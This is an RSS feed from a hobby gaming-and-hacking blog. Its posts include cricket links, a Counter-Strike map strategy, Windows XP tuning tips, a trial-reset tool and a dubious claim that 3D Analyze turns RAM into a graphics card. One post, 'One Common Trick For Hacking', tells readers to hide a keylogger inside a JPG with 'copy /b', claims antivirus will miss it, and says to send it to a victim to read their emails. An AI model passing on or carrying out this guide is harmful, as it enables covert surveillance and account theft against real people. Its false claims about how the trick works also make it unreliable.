<?xml version='1.0' encoding='UTF-8'?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-1494206806639612959</atom:id><lastBuildDate>Wed, 28 Aug 2024 08:47:56 +0000</lastBuildDate><category>Tricks</category><category>Hacking</category><category>tips</category><category>Counter Strike</category><category>software reviews</category><category>tutorial</category><category>user request</category><category>strategies</category><title>Counter Strike And Hacking Combined</title><description></description><link>http://thecounterhack.blogspot.com/</link><managingEditor>noreply@blogger.com (Hitesh)</managingEditor><generator>Blogger</generator><openSearch:totalResults>30</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1494206806639612959.post-8078467929437389771</guid><pubDate>Mon, 25 Jul 2011 11:56:00 +0000</pubDate><atom:updated>2011-07-25T17:26:11.558+05:30</atom:updated><title>Cricinfo International Scores</title><description>&lt;a href=&quot;http://www.cricinfo.com/ci/content/site/product/widgets/scores_sizes.html&quot;&gt;Cricinfo International Scores&lt;/a&gt;</description><link>http://thecounterhack.blogspot.com/2011/07/cricinfo-international-scores.html</link><author>noreply@blogger.com (Hitesh)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1494206806639612959.post-8278595962355429455</guid><pubDate>Mon, 25 Jul 2011 10:12:00 +0000</pubDate><atom:updated>2011-07-25T16:00:45.750+05:30</atom:updated><title>INDIA V/S ENGLAND TEST MATCH LORDS .. njoy!!</title><description>&lt;script type=&#39;text/javascript&#39;&gt;id=&#39;vsdfgrw&#39;; width=&#39;580&#39;; height=&#39;400&#39;;&lt;/script&gt;&lt;script type=&#39;text/javascript&#39; src=&#39;http://liveview365.com/js/player.js&#39;&gt;&lt;/script&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;just close the ads which use to appear for uninterrupted feed&lt;br /&gt;&lt;br /&gt;- Hitesh :)</description><link>http://thecounterhack.blogspot.com/2011/07/idvsdfgrw-width580-height400.html</link><author>noreply@blogger.com (Hitesh)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1494206806639612959.post-4135897427245125273</guid><pubDate>Sat, 01 Jan 2011 08:22:00 +0000</pubDate><atom:updated>2011-04-22T14:56:44.264+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">tips</category><category domain="http://www.blogger.com/atom/ns#">Tricks</category><title>Convert your RAM into a Graphic card</title><description>&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like href=&quot;http://thecounterhack.blogspot.com/2009/09/convert-your-ram-into-graphic-card.html&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot; font=&quot;&quot;&gt;&lt;/fb:like&gt;&lt;br /&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5GsUXWzG8sVV-DgoVVi63vzslGZ36GKhS7oojnwkizEDX2CYMEU2QDsHoG10dT3fN2pgG-gxj9U-OBGNVaon-ZdBHMCXG1K5vU9VowPVCLR_wWNNn7Skw5j-yY3QL5jngmLts9Bc1ZuM/s1600-h/0454115v8.jpg&quot;&gt;&lt;img id=&quot;BLOGGER_PHOTO_ID_5377527187201358946&quot; style=&quot;FLOAT: right; MARGIN: 0px 0px 10px 10px; WIDTH: 320px; CURSOR: hand; HEIGHT: 196px&quot; alt=&quot;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5GsUXWzG8sVV-DgoVVi63vzslGZ36GKhS7oojnwkizEDX2CYMEU2QDsHoG10dT3fN2pgG-gxj9U-OBGNVaon-ZdBHMCXG1K5vU9VowPVCLR_wWNNn7Skw5j-yY3QL5jngmLts9Bc1ZuM/s320/0454115v8.jpg&quot; border=&quot;0&quot; /&gt;&lt;/a&gt;&lt;br /&gt;▓ Virtual Graphics Card ▓&lt;br /&gt;-&amp;gt;Play latest Games without Graphic Cards&lt;br /&gt;-&amp;gt;Many times we are stuck up with a system that just doesn’t provide enough juice to run the latest game…this results in-&amp;gt;&lt;br /&gt;-&amp;gt;you either spend a pot of money (atleast Rupees 3500 or 70$) for getting the latest graphics card&lt;br /&gt;-&amp;gt;or you just read reviews of games like Crysis , Far Cry on gamespot and feel like a noob,fully knowing that your system just won’t be able to support it....&lt;br /&gt;-&amp;gt;Take heart ! Here’s a wicked software with which you can beat 128-256 MB of graphics card requirements with a very modest 1GB DDR2 RAM.&lt;br /&gt;link -&amp;gt; &lt;a href=&quot;http://www.ziddu.com/download/4104619/3danalyze&quot;&gt;Download 3d analyze&lt;/a&gt;&lt;br /&gt;-&amp;gt;What it does is,it uses a part of your RAM as Graphics card memory. For example,if you got 1GB DDR2 RAM,then&lt;br /&gt;it’ll use 128MB of it as a Virtual Graphics card,and the remaining 896MB will be used as a regular RAM.&lt;br /&gt;-&amp;gt;Cool right….so you can Virtually emulate NVIDIA GeForce TI 4600,NVIDIA GeForce FX 4900 ULTRA,ATi Radeon 8500,&lt;br /&gt;ATi Radeon 9800 PRO.&lt;br /&gt;&lt;br /&gt;Note : I will post list of games on request&lt;br /&gt;&lt;br /&gt;Regards&lt;br /&gt;&lt;br /&gt;●๋●н•-------●2•--------●k•-------●2●๋•&lt;br /&gt;&lt;br /&gt;нαck τнε нαckεг kгαck τнε kгαckεг&lt;br /&gt;&lt;div id=&quot;fb-root&quot;&gt;&lt;/div&gt;&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#appId=APP_ID&amp;amp;xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:comments href=&quot;http://thecounterhack.blogspot.com/2009/09/convert-your-ram-into-graphic-card.html&quot; num_posts=&quot;5&quot; width=&quot;500&quot;&gt;&lt;/fb:comments&gt;</description><link>http://thecounterhack.blogspot.com/2009/09/convert-your-ram-into-graphic-card.html</link><author>noreply@blogger.com (Hitesh)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5GsUXWzG8sVV-DgoVVi63vzslGZ36GKhS7oojnwkizEDX2CYMEU2QDsHoG10dT3fN2pgG-gxj9U-OBGNVaon-ZdBHMCXG1K5vU9VowPVCLR_wWNNn7Skw5j-yY3QL5jngmLts9Bc1ZuM/s72-c/0454115v8.jpg" height="72" width="72"/><thr:total>7</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1494206806639612959.post-434548708214289565</guid><pubDate>Wed, 13 Jan 2010 10:13:00 +0000</pubDate><atom:updated>2011-04-22T17:58:48.399+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Tricks</category><category domain="http://www.blogger.com/atom/ns#">tutorial</category><title>One Common Trick For Hacking</title><description>&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like href=&quot;http://thecounterhack.blogspot.com/2010/01/one-common-trick-for-hacking.html&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot; font=&quot;&quot;&gt;&lt;/fb:like&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdtl9gXBMyFtn-n-HjiKs3WZldxGfP4DevEGZWYnX7ZezCOAgdqN_Mkv2VjWn04ysu3ODjh1neH4xPFLo_r-y7b3NtSTGgj81Wmq2R0GvLySqO9rfEc3TA8qBNz_NKkCsGJL8Rnb6aLPU/s1600-h/hackingisnotacrime_web_hacking_is_not_a_crime.gif&quot;&gt;&lt;img style=&quot;float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 336px; height: 378px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdtl9gXBMyFtn-n-HjiKs3WZldxGfP4DevEGZWYnX7ZezCOAgdqN_Mkv2VjWn04ysu3ODjh1neH4xPFLo_r-y7b3NtSTGgj81Wmq2R0GvLySqO9rfEc3TA8qBNz_NKkCsGJL8Rnb6aLPU/s400/hackingisnotacrime_web_hacking_is_not_a_crime.gif&quot; alt=&quot;&quot; id=&quot;BLOGGER_PHOTO_ID_5426167811750406994&quot; border=&quot;0&quot; /&gt;&lt;/a&gt;&lt;br /&gt;1.Basic requirements are you should have a key logger and a picture of  .jpg format or any other format of your wish but i recommend .jpg as it  is easy to download.&lt;br /&gt;&lt;br /&gt;2.I recommend &quot;INSIDE KEYLOGGER&quot;&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://www.inside-logger.com/setups/insidekeylogger.exe&quot;&gt;download inside keylogger&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;3.Install  the keylogger and give your email id in the Email options, I recomend  yahoo. So you are half way done.&lt;br /&gt;&lt;br /&gt;4.Now move to the folder in  which you have your keylogger and one jpg image Zip both the files and  save it in .jpeg format and upload the file on to the server. As the  server will not allow you to upload the .exe files&lt;br /&gt;&lt;br /&gt;5.This is  another method to hide your Keylogger&lt;br /&gt;copy these files to C:\ drive  and paste them into a folder and open the command prompt window&lt;br /&gt;&lt;br /&gt;6.  the most important step is type this command at command prompt.&lt;br /&gt;&lt;br /&gt;copy  /b sourceimagefile.jpg + filetobehidden.exe targetimage.jpg&lt;br /&gt;Now the  logger in the .jpeg format&lt;br /&gt;&lt;br /&gt;7.Now the antivirus cant detect the  file.&lt;br /&gt;&lt;br /&gt;8.Just send the uploaded image to the victim as soon as he  clicks the image file invisible keylogger will be installed.&lt;br /&gt;He&#39;ll b  enjoying with picture and you enjoy with his emails&lt;br /&gt;&lt;div id=&quot;fb-root&quot;&gt;&lt;/div&gt;&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#appId=APP_ID&amp;amp;xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:comments href=&quot;http://thecounterhack.blogspot.com/2010/01/one-common-trick-for-hacking.html&quot; num_posts=&quot;5&quot; width=&quot;500&quot;&gt;&lt;/fb:comments&gt;</description><link>http://thecounterhack.blogspot.com/2010/01/one-common-trick-for-hacking.html</link><author>noreply@blogger.com (Hitesh)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdtl9gXBMyFtn-n-HjiKs3WZldxGfP4DevEGZWYnX7ZezCOAgdqN_Mkv2VjWn04ysu3ODjh1neH4xPFLo_r-y7b3NtSTGgj81Wmq2R0GvLySqO9rfEc3TA8qBNz_NKkCsGJL8Rnb6aLPU/s72-c/hackingisnotacrime_web_hacking_is_not_a_crime.gif" height="72" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1494206806639612959.post-2263723229591937611</guid><pubDate>Sat, 12 Sep 2009 23:01:00 +0000</pubDate><atom:updated>2009-09-13T04:36:56.905+05:30</atom:updated><title>Mapwise Strategy : De_Inferno</title><description>&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAmr-gNn5oVl58Naa0k0DRXRO5CSO9fNHsCBhY_xCNtmcAW69dKGbzZIwbTY0Bx4GMfuPv_t86Catr7Vhtrib6joqiCTauwbRr7o_WHlubN7XpXDCKUM4K1O88bgjwm6UahaM7fbVRYTk/s1600-h/1036.gif&quot;&gt;&lt;img id=&quot;BLOGGER_PHOTO_ID_5380720906096197474&quot; style=&quot;FLOAT: right; MARGIN: 0px 0px 10px 10px; WIDTH: 400px; CURSOR: hand; HEIGHT: 350px&quot; alt=&quot;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAmr-gNn5oVl58Naa0k0DRXRO5CSO9fNHsCBhY_xCNtmcAW69dKGbzZIwbTY0Bx4GMfuPv_t86Catr7Vhtrib6joqiCTauwbRr7o_WHlubN7XpXDCKUM4K1O88bgjwm6UahaM7fbVRYTk/s400/1036.gif&quot; border=&quot;0&quot; /&gt;&lt;/a&gt;&lt;br /&gt;Counter-Terrorist (CT) Side:&lt;br /&gt;Pistol Round #1: 2 banana site, 3 stay back in main site.&lt;br /&gt;Pistol Round #2: 2 play very aggressive at banana at start of the round. If the Ts don&#39;t look to be coming banana, the 2 can either push down banana or your team can leave 1 spotting down banana while 1 falls back to main site. The other 3 stay back in main site.&lt;br /&gt;&lt;br /&gt;Gun Round Setup #1: 1 trying to spot down banana with awp, 1 going banana then back to main site if Ts don&#39;t rush it, 1 in apartment or in site watching apartment, 1 left middle, 1 right middle.&lt;br /&gt;Gun Round Setup #2: 2 at banana, 1 in apartment or in site watching apartment, 1 left middle, 1 right middle.&lt;br /&gt;Gun Round Setup #3: 2 at banana, 1 watching apartment from in site, 2 right middle (side farthest from apartment).&lt;br /&gt;&lt;br /&gt;Terrorist (T) Side:&lt;br /&gt;Player1: AK&lt;br /&gt;Player2: AK&lt;br /&gt;Player3: AWP&lt;br /&gt;Player4: AK&lt;br /&gt;Player5: AK&lt;br /&gt;&lt;br /&gt;T side:&lt;br /&gt;&lt;br /&gt;First Round T side:&lt;br /&gt;Buys:Player1 buys 2 flashes, nade or smoke&lt;br /&gt;Player2 buys 2 flashes, smoke&lt;br /&gt;Player3 buys armor&lt;br /&gt;Player4 buys armor&lt;br /&gt;Player5 buys 2 flashes, smoke or nade&lt;br /&gt;&lt;br /&gt;*Wait a few seconds in case of nade stack.&lt;br /&gt;*Player2, Player3, Player1 move up banana as quietly as possible. WATCH FOR PUSHED UP CTS.&lt;br /&gt;*Player3 stays at stairs watching up mid.&lt;br /&gt;*Player5 goes alt-middle and then lays down smoke and then flashes mid.&lt;br /&gt;*Player2 lays down smoke cutting off CT spawn from banana bomb site.&lt;br /&gt;*Player4 moves up to help at banana.&lt;br /&gt;*Flash Banana site and then Players 1-4 take the site. Player5 watches the flank unless the rest of the team needs help.&lt;br /&gt;*Plant and cover bomb.&lt;br /&gt;&lt;br /&gt;Banana strat: (Player2 has bomb)&lt;br /&gt;*Player3 tries to quick pick banana(spawn dependent) with the awp.&lt;br /&gt;*Player2, Player1, Player3 then move up banana as quietly as possible.&lt;br /&gt;*Player4 watches mid.&lt;br /&gt;*Player5 watches apartment and alt-mid area.&lt;br /&gt;*Player2 lays down smoke cutting off CT spawn from banana bombsite.&lt;br /&gt;*Player1 flashes.&lt;br /&gt;*Sit back and wait for CTs to flash/nade back.&lt;br /&gt;*Player5 distracts at main site with smokes/flashes at middle.&lt;br /&gt;*Player4 moves to banana.&lt;br /&gt;*Player1 lays down his smoke in the same place Player2 did cutting off CT spawn from banana site.&lt;br /&gt;*Unload flashes, and take the site.&lt;br /&gt;*Player5 watches the flank unless the rest of the team needs help.&lt;br /&gt;*Plant bomb and cover bomb.&lt;br /&gt;&lt;br /&gt;Banana FAKE strat: (Player2 has bomb)&lt;br /&gt;*Player3 tries to quick pick banana with the awp.&lt;br /&gt;*Player2, Player1, Player3 move up banana as quietly as possible.&lt;br /&gt;*Player4 watches middle.&lt;br /&gt;*Player5 watches apartment and alt-middle.&lt;br /&gt;*Player2 lays down smoke cutting off CT spawn from banana.&lt;br /&gt;*Player1 flashes into banana site.&lt;br /&gt;*Sit back and wait for CTs to flash/nade back.&lt;br /&gt;*Player5 distracts at main site with smokes flashes mid.&lt;br /&gt;*Player1 lays down his smoke in the same place Player2 did blocking CT spawn from banana site.&lt;br /&gt;*Player1, Player2, Player3 Unload flashes, then fall back to main site.&lt;br /&gt;*The whole team will fall back banana then come middle and take the main site, except Player5 who goes apartment.&lt;br /&gt;*Plant bomb and cover bomb.&lt;br /&gt;&lt;br /&gt;Banana Split: (Player5 has bomb)&lt;br /&gt;*Player3, Player5 go banana. Try for quick pick, then wait quietly.&lt;br /&gt;*Player4 watches CT window room(alt-mid) from balcony of the apartment building.&lt;br /&gt;*Player2, Player1 move up under the CT window room in alt-middle.&lt;br /&gt;*Player2 throws a small fake by flashing mid, smoking mid, then falling back to a save place.&lt;br /&gt;*Wait for CT counterflashes at mid.&lt;br /&gt;*Player4 falls down from balcony and moves to under window room.&lt;br /&gt;*Player1 flashes then smokes out right side of middle(side closest to apartment) to block any CTS on right side middle. Player4 also smokes out this side of mid.&lt;br /&gt;*Flash both sides of middle then move up middle to ct spawn to banana.&lt;br /&gt;*When Player2, Player1, Player4 are in CT spawn they call &quot;flash banana&quot;.&lt;br /&gt;*Player5 flashes banana site twice.&lt;br /&gt;*All 5 team members converge on banana bomsite and take it together.&lt;br /&gt;*Plant and cover bomb.&lt;br /&gt;&lt;br /&gt;Main bomb site strat: (Player4 has bomb)&lt;br /&gt;*Player2 stays at banana/middle area to watch flank.&lt;br /&gt;*Player5 tries to rush apartment and get quick kill there. DON&#39;T rush all the way out the back, just rush into it to see if any CTs push up.&lt;br /&gt;*Player3 watches CT alt-mid window room from balcony.&lt;br /&gt;*Player1, Player4 move up alt-mid under the window.&lt;br /&gt;*Player1 flashes mid, lays down smoke at mid then falls back to a save place.&lt;br /&gt;*Wait for CT flashes/nades.&lt;br /&gt;*Player4 boosts Player1 into CT window room. If you have trouble doing this, give it up after a few tries and Player1 can just go with Player4 and Player3.&lt;br /&gt;*Player3 meets up with Player4 under window room in alt-middle.&lt;br /&gt;*Player4 flashes and smokes out left middle(library side). Player3 also smokes left mid.&lt;br /&gt;*Player4, Player3, flash both sides of mid and push of mid, Player1 pushes out front apartment door, and Player5 delays out of back of apartment.&lt;br /&gt;*Take the main bomb site, plant, and cover bomb.&lt;br /&gt;*Timing is a key to this strat.&lt;br /&gt;&lt;br /&gt;Spread Strat: (Player2 has bomb)&lt;br /&gt;*Player3, Player5 work banana.&lt;br /&gt;*Player2 and Player4 can work middle.&lt;br /&gt;*Player1 can work the apartment.&lt;br /&gt;*This is just a spread the team out and get picks strat. If the other team likes to push a lot, this could be a good strat as long as your team is smart enough to sit back and wait for the pushing CTs.&lt;br /&gt;&lt;br /&gt;source :counterstrikestrats</description><link>http://thecounterhack.blogspot.com/2009/09/mapwise-strategy-deinferno.html</link><author>noreply@blogger.com (Hitesh)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAmr-gNn5oVl58Naa0k0DRXRO5CSO9fNHsCBhY_xCNtmcAW69dKGbzZIwbTY0Bx4GMfuPv_t86Catr7Vhtrib6joqiCTauwbRr7o_WHlubN7XpXDCKUM4K1O88bgjwm6UahaM7fbVRYTk/s72-c/1036.gif" height="72" width="72"/><thr:total>8</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1494206806639612959.post-3092294557313835920</guid><pubDate>Sat, 12 Sep 2009 22:51:00 +0000</pubDate><atom:updated>2009-09-13T04:26:04.663+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">software reviews</category><category domain="http://www.blogger.com/atom/ns#">tips</category><category domain="http://www.blogger.com/atom/ns#">Tricks</category><title>How to use a trial software forever legally</title><description>&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYqVseJwwbRcKnebuKEs-w2rnBunmDEzcLU1VljRXwPwLrXCTxYGfOL18ATHJ3to6_ujpj2BEkPGdY-o64oSt8x2HtQvdnFBIrILd8kF7zgaiGhiyizPXmNE849FnXvmyydBKEge_DOHk/s1600-h/time_stopper-135749-1245663211.jpg&quot;&gt;&lt;img id=&quot;BLOGGER_PHOTO_ID_5380718427351525154&quot; style=&quot;FLOAT: right; MARGIN: 0px 0px 10px 10px; WIDTH: 399px; CURSOR: hand; HEIGHT: 400px&quot; alt=&quot;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYqVseJwwbRcKnebuKEs-w2rnBunmDEzcLU1VljRXwPwLrXCTxYGfOL18ATHJ3to6_ujpj2BEkPGdY-o64oSt8x2HtQvdnFBIrILd8kF7zgaiGhiyizPXmNE849FnXvmyydBKEge_DOHk/s400/time_stopper-135749-1245663211.jpg&quot; border=&quot;0&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div&gt;Now we download stuff almost daily. New products pop out so often. You can use any software forever you want. You can download trial version, right. Trial version expires after some days. You can stop that expiration. You can tell trial version of the software to not count days or do not bother about time. The software will stay and keep working like original software forever and will not expire or cease to work. You do not have to change your system clock. This little software does it all.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Time Stopper is the software which can stop the time for try out version software. When you stop the time you can use your try-out versions forever. When you stop the time of a try-out version using this Time Stopper it works via this Time Stopper. Real time and date run normally on your system. You can use any number of try-out version softwares with this software.&lt;br /&gt;&lt;br /&gt;How it Works&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1. Open Time Stopper&lt;br /&gt;2. Browse and select .exe of required trial software&lt;br /&gt;3. Choose the new date (Any date which occurs in between your trial software time period before expiration, suggestion: set it to two days before trial software expiration date.)&lt;br /&gt;4. Choose any time&lt;br /&gt;5. Click open software on your selected date&lt;br /&gt;&lt;br /&gt;If you wish to create an icon for your modified trial software and do not want to open Time stopper every time then use last button in software to create new icon. open that trial software after that from that newly created icon always otherwise it can expire.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This is 100% free and 100% legal!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://files.getdropbox.com/u/657816/Programs/TS2.zip&quot;&gt;Download&lt;/a&gt;&lt;/div&gt;</description><link>http://thecounterhack.blogspot.com/2009/09/how-to-use-trial-software-forever.html</link><author>noreply@blogger.com (Hitesh)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYqVseJwwbRcKnebuKEs-w2rnBunmDEzcLU1VljRXwPwLrXCTxYGfOL18ATHJ3to6_ujpj2BEkPGdY-o64oSt8x2HtQvdnFBIrILd8kF7zgaiGhiyizPXmNE849FnXvmyydBKEge_DOHk/s72-c/time_stopper-135749-1245663211.jpg" height="72" width="72"/><thr:total>3</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1494206806639612959.post-7409646106497725116</guid><pubDate>Sat, 12 Sep 2009 07:44:00 +0000</pubDate><atom:updated>2009-09-13T01:36:12.254+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">tips</category><title>Increase Your Computer Speed !</title><description>&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWmuCdo5JBD-sr9rQ9Cpfc0bjLJeeDEEXLCEpeeKtgP_fYy_KktruZvYoLnvN-N3sILuh3CM2zjeud-6cSUciq7alqmg95HrkIxKWcm2Lhc4yJ6W2y3eri5Y-V3UfWKVpnfVBPSuA3W8M/s1600-h/increase+speed.JPG&quot;&gt;&lt;img id=&quot;BLOGGER_PHOTO_ID_5380674675447440626&quot; style=&quot;DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 500px; CURSOR: hand; HEIGHT: 251px; TEXT-ALIGN: center&quot; alt=&quot;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWmuCdo5JBD-sr9rQ9Cpfc0bjLJeeDEEXLCEpeeKtgP_fYy_KktruZvYoLnvN-N3sILuh3CM2zjeud-6cSUciq7alqmg95HrkIxKWcm2Lhc4yJ6W2y3eri5Y-V3UfWKVpnfVBPSuA3W8M/s400/increase+speed.JPG&quot; border=&quot;0&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div&gt;1.) &lt;span style=&quot;FONT-WEIGHT: bold&quot;&gt;Services You Can Disable&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;There are quite a few services you can disable from starting automatically.&lt;br /&gt;This would be to speed up your boot time and free resources.&lt;br /&gt;They are only suggestions so I suggestion you read the description of each one when you run Services&lt;br /&gt;and that you turn them off one at a time.&lt;br /&gt;&lt;br /&gt;Some possibilities are:&lt;br /&gt;Alerter&lt;br /&gt;Application Management&lt;br /&gt;Clipbook&lt;br /&gt;Fast UserSwitching&lt;br /&gt;Human Interface Devices&lt;br /&gt;Indexing Service&lt;br /&gt;Messenger&lt;br /&gt;Net Logon&lt;br /&gt;NetMeeting&lt;br /&gt;QOS RSVP&lt;br /&gt;Remote Desktop Help Session Manager&lt;br /&gt;Remote Registry&lt;br /&gt;Routing &amp;amp; Remote Access&lt;br /&gt;SSDP Discovery Service&lt;br /&gt;Universal Plug and Play Device Host&lt;br /&gt;Web Client&lt;br /&gt;&lt;br /&gt;2.)&lt;span style=&quot;FONT-WEIGHT: bold&quot;&gt;Cleaning the Prefetch Directory&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Windows XP has a new feature called Prefetch. This keeps a shortcut to recently used programs.&lt;br /&gt;However it can fill up with old and obsolete programs.&lt;br /&gt;&lt;br /&gt;To clean this periodically go to:&lt;br /&gt;&lt;br /&gt;Star / Run / Prefetch&lt;br /&gt;Press Ctrl-A to highlight all the shorcuts&lt;br /&gt;Delete them&lt;br /&gt;&lt;br /&gt;Clearing the Page File on Shutdown&lt;br /&gt;&lt;br /&gt;Click on the Start button&lt;br /&gt;Go to the Control Panel&lt;br /&gt;Administrative Tools&lt;br /&gt;Local Security Policy&lt;br /&gt;Local Policies&lt;br /&gt;Click on Security Options&lt;br /&gt;Right hand menu - right click on &quot;Shutdown: Clear Virtual Memory Pagefile&quot;&lt;br /&gt;Select &quot;Enable&quot;&lt;br /&gt;Reboot&lt;br /&gt;&lt;br /&gt;For regedit users.....&lt;br /&gt;If you want to clear the page file on each shutdown:&lt;br /&gt;&lt;br /&gt;Start Regedit&lt;br /&gt;Go to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory ManagementClearPageFileAtShutdown&lt;br /&gt;Set the value to 1&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3.)&lt;span style=&quot;FONT-WEIGHT: bold&quot;&gt;No GUI Boot&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;If you don&#39;t need to see the XP boot logo,&lt;br /&gt;&lt;br /&gt;Run MSCONFIG&lt;br /&gt;Click on the BOOT.INI tab&lt;br /&gt;Check the box for /NOGUIBOOT&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;4.)&lt;span style=&quot;FONT-WEIGHT: bold&quot;&gt;Decreasing Boot Time&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Microsoft has made available a program to analyze and decrease the time it takes to boot to Windows XP&lt;br /&gt;The program is called BootVis&lt;br /&gt;&lt;br /&gt;Uncompress the file.&lt;br /&gt;Run BOOTVIS.EXE&lt;br /&gt;For a starting point, run Trace / Next Boot + Driver Delays&lt;br /&gt;This will reboot your computer and provide a benchmark&lt;br /&gt;After the reboot, BootVis will take a minute or two to show graphs of your system startup.&lt;br /&gt;Note how much time it takes for your system to load (click on the red vertical line)&lt;br /&gt;Then run Trace / Optimize System&lt;br /&gt;Re-Run the Next Boot + Drive Delays&lt;br /&gt;Note how much the time has decreased&lt;br /&gt;Mine went from approximately 33 to 25 seconds.&lt;br /&gt;&lt;br /&gt;5.)&lt;span style=&quot;FONT-WEIGHT: bold&quot;&gt;Increasing Graphics Performance&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;By default, Windows XP turns on a lot of shadows, fades, slides etc to menu items.&lt;br /&gt;Most simply slow down their display.&lt;br /&gt;&lt;br /&gt;To turn these off selectively:&lt;br /&gt;&lt;br /&gt;Right click on the My Computer icon&lt;br /&gt;Select Properties&lt;br /&gt;Click on the Advanced tab&lt;br /&gt;Under Performance, click on the Settings button&lt;br /&gt;To turn them all of, select Adjust for best performance&lt;br /&gt;My preference is to leave them all off except for Show shadows under mouse pointer and Show window contents while dragging&lt;br /&gt;&lt;br /&gt;6.)&lt;span style=&quot;FONT-WEIGHT: bold&quot;&gt;Increasing System Performance&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;If you have 512 megs or more of memory, you can increase system performance&lt;br /&gt;by having the core system kept in memory.&lt;br /&gt;&lt;br /&gt;Start Regedit&lt;br /&gt;Go to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory ManagementDisablePagingExecutive&lt;br /&gt;Set the value to be 1&lt;br /&gt;Reboot the computer&lt;br /&gt;&lt;br /&gt;7.)&lt;span style=&quot;FONT-WEIGHT: bold&quot;&gt;Increasing File System Caching&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;To increase the amount of memory Windows will locked for I/O operations:&lt;br /&gt;&lt;br /&gt;Start Regedit&lt;br /&gt;Go to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory Management&lt;br /&gt;Edit the key IoPageLockLimit&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;these all are really working tips . Have Fun&lt;br /&gt;Regards&lt;br /&gt;●๋●н•-------●2•--------●k•-------●2●๋•&lt;br /&gt;нαck τнε нαckεг kгαck τнε kгαckεг&lt;/div&gt;</description><link>http://thecounterhack.blogspot.com/2009/09/increase-your-computer-speed.html</link><author>noreply@blogger.com (Hitesh)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" 